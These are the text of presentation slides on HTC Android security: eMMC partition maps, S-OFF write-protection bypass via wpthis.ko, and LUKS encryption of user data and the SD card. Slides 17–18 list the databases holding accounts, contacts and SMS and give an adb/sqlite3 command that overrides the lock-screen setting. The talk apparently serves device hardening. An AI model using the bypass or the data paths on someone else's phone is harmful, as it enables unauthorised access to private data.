  • 3. /dev/block/mmcblk0p1 - 512 000 - dbl • /dev/block/mmcblk0p3 - 4 608 000 - osbl • /dev/block/mmcblk0p4 - 1 024 - header_rex_amss • /dev/block/mmcblk0p5 - 30 720 000 - rex_amss • /dev/block/mmcblk0p6 - 12 800 000 - modem_DSP • /dev/block/mmcblk0p7 - 2 097 152 - CID, Secure_Flag, IMEI, rcdata.img • /dev/block/mmcblk0p8 - 3 145 728 • /dev/block/mmcblk0p9 - 2 097 152 • /dev/block/mmcblk0p10 - 1 048 576 • /dev/block/mmcblk0p11 - 1 048 576 • /dev/block/mmcblk0p12 - 8 961 536 • /dev/block/mmcblk0p13 - 3 145 728 - reserved for modem storage • /dev/block/mmcblk0p14 - 3 145 728 - reserved for modem storage • /dev/block/mmcblk0p15 - 1 048 576 • /dev/block/mmcblk0p16 - 9 172 480 • /dev/block/mmcblk0p17 - 262 144 - misc • /dev/block/mmcblk0p18 - 1 048 576 - hboot • /dev/block/mmcblk0p19 - 1 048 576 - sp1 • /dev/block/mmcblk0p20 - 1 310 720 - wifi • /dev/block/mmcblk0p21 - 8 909 824 - recovery • /dev/block/mmcblk0p22 - 4 194 304 - boot • /dev/block/mmcblk0p23 - 262 144 - mfg • /dev/block/mmcblk0p24 - 2 096 128 - sp2 • /dev/block/mmcblk0p25 - 585 104 896 - system • /dev/block/mmcblk0p26 - 1 232 076 288 - userdata • /dev/block/mmcblk0p27 - 314 572 288 - cache • /dev/block/mmcblk0p28 - 21 757 440 - devlog • /dev/block/mmcblk0p29 - 262 144 - pdata
  • 4. S-ON S-OFF eMMC read, writing Writing in any eMMC only to user-available partition, except partitions partition 7 Flashing only HTC- Flashing any third- signed firmware party modified firmware, including hboot, recovery and custom roms
  • 5. mmcblk0p7 CID IMEI S-Flag
  • 7. Powercycle Partition7 gfree wpthis.ko eMMC injection •void powercycle_emmc() { gpio_tlmm_config(PCOM_GPIO_CFG(88, 0, GPIO_OUTPUT, GPIO_NO_PULL, GPIO_2MA), 0); // turn off. wpthis.ko gpio_set_value(88, 0); mdelay(200); // turn back on. gpio_set_value(88, 1); mdelay(200); }
  • 8. drivers/mmc/card/block.c #if 1 #if 0 if (board_emmc_boot()) if (mmc_card_mmc(card)) { if (brq.cmd.arg < 131073) {/* should not write any value before 131073 */ pr_err("%s: pid %d(tgid %d)(%s)n", func, (unsigned)(current->pid), (unsigned)(current->tgid), current->comm); pr_err("ERROR! Attemp to write radio partition start %d size %dn", brq.cmd.arg, blk_rq_sectors(req)); BUG(); return 0; } #endif
  • 9.
  • 10. Preparations Android 2.3-4.1 • Rooted Android OS, stock or custom Busybox • Android console utility pack installed lm.cryptsetup • Android console LUKS-manager installed USB Debugging Enabled • Access to device’s shell by USB “reboot” binary • Reboot binary from the ROM Manager contents
  • 11. In the Android Shell: #busybox dd if=/dev/zero of=/data/secure0 bs=1M count 800 #losetup /dev/block/loop3 /data/secure0 #lm.cryptsetup luksFormat –c aes-plain /dev/block/loop3 #lm.cryptsetup luksOpen /dev/block/loop3 data #mke2fs –T ext4 –L Secure0 -F /dev/mapper/data #lm.cryptsetup luksClose data In the CWM Recovery: parted /dev/block/mmcblk1 print rm 1 mkpartfs primary fat32 0 4032 mkpartfs primary ext2 4032 8065 quit In the Android Shell: #lm.cryptsetup luksFormat –c aes-plain /dev/block/mmcblk1p2 #lm.cryptsetup luksOpen /dev/block/mmcblk1p2 sdcard #mkfs.vfat -n Seccard0 /dev/mapper/sdcard #lm.cryptsetup luksClose sdcard
  • 12. In the Android Shell: #losetup /dev/block/loop3 /data/secure0 #lm.cryptsetup luksOpen /dev/block/loop3 data #mount –o remount,rw / #mkdir /DATA #mount –t ext4 /dev/mapper/data /DATA # cp -a /data/app /DATA # cp -a /data/app-private /DATA # cp -a /data/backup /DATA # cp -a /data/data /DATA # cp -a /data/dontpanic /DATA # cp -a /data/drm /DATA # cp -a /data/etc /DATA # cp -a /data/htcfs /DATA # cp -a /data/local /DATA # cp -a /data/misc /DATA # cp -a /data/property /DATA # cp -a /data/secure /DATA # cp -a /data/system /DATA # cp -a /data/zipalign.log /DATA # mkdir /DATA/d # mkdir /DATA/dalvik-cache # umount /DATA # lm.cryptsetup luksClose data
  • 13. Entering encrypted mode: #setprop ctl.stop zygote #mount -o remount,rw rootfs / #mkdir /DATA #mkdir /mnt/SDCARD #mount -o move /mnt/sdcard /mnt/SDCARD #lm.cryptsetup luksOpen /dev/block/mmcblk1p2 sdcard #mount -t vfat /dev/mapper/sdcard /mnt/sdcard #mount -o remount,ro rootfs / #mount /dev/block/mmcblk0p26 /DATA #losetup /dev/block/loop5 /DATA/secure0 #lm.cryptsetup luksOpen /dev/block/loop5 data #umount /data -l #mount -t ext4 /dev/mapper/data /data #setprop ctl.start zygote #killall zygote Leaving encrypted mode: #sync #setprop ctl.stop zygote #setprop ctl.stop runtime #setprop ctl.stop keystore #fuser /data –m -k #umount /data #/lm.cryptsetup luksClose data #/system/bin/reboot
  • 14.
  • 15. CWM S-ON S-OFF ADB #Root /data/ recovery
  • 16.
  • 17. /data/system/accounts.db /data/data/com.android.providers.contacts/databases/contacts2.db • Contacts • Call history /data/data/com.android.providers.telephony/databases/mmssms.db • Sms
  • 18. adb shell # sqlite3 /data/data/com.android.providers.settings/databases/settings.db sqlite> update secure set value=65536 where name='lockscreen.password_type'; sqlite> .exit # exit adb reboot
  • 19. Basic Moderate Recomended • USB • S-ON • Data Debugging • Stock Encryption Disable Firmware • Unknown Sources Off • PinLock
  • 20. Thank you for listening! See you next time.